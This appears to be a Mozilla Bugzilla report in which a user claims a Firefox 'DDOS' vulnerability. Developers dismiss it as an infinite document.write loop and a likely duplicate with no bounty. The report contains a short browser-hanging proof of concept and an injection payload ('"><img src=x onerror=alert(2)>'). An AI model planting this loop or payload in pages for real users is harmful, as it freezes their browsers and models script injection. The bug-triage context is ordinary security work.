817629 - Possible DDOS in js/html

Status: RESOLVED INCOMPLETE

(Core :: JavaScript Engine, defect)

Description

[Curtis Koenig [:curtisk-use curtis.koenig+bzATgmail.com]]]

Hi I have found and a Firefox DDOS Vulnerability is based on this html code make it , stop it with no responces and if you  close it Firefox.exe will stay there.
HTML CODE 
demo:
http://static.anonhtml.com/e4aa770f46.html
IMG:
http://i.imgur.com/6eIny.png
Hope you guys fix this vulnerabilty
I will send this exploit to Exploit-db in the next hours hope you guys fix this vulnerability.
Sergio Yoshikata Lima Perú

<!DOCTYPE html>
<html>
<body>

<script language="javascript">
var i = 2;
while (i <= 10) {
document.write ('"><img src=x onerror=alert(2)>/foobar');
i -= 2;
}
</script>

</body>
</html>

Comment 1

[Boris Zbarsky [:bzbarsky]]

So the actual "vulnerability" is just:

  <script>
    while (true) {
      document.write("<img src="x" onerror='alert(2)'>");
    }
  </script>

Possibly even without the alert() bit, yes?

This is a duplicate, I would think...

Comment 2

[Sergio Yoshikata]

Yeah that's the vulnerability
(In reply to Boris Zbarsky (:bz) from comment #1)
> So the actual "vulnerability" is just:
> 
>   <script>
>     while (true) {
>       document.write("<img src="x" onerror='alert(2)'>");
>     }
>   </script>
> 
> Possibly even without the alert() bit, yes?
> 
> This is a duplicate, I would think...

Comment 3

[David Chan [:dchan]]

I will find the bug to dupe this against.

Sergio: Unfortunately this bug does not meet the severity rating to qualify for a bounty.

Comment 4

[Sergio Yoshikata]

(In reply to David Chan [:dchan] from comment #3)
> I will find the bug to dupe this against.
> 
> Sergio: Unfortunately this bug does not meet the severity rating to qualify
> for a bounty.

Actually I just want to Mozilla to patch the vulnerabilty a least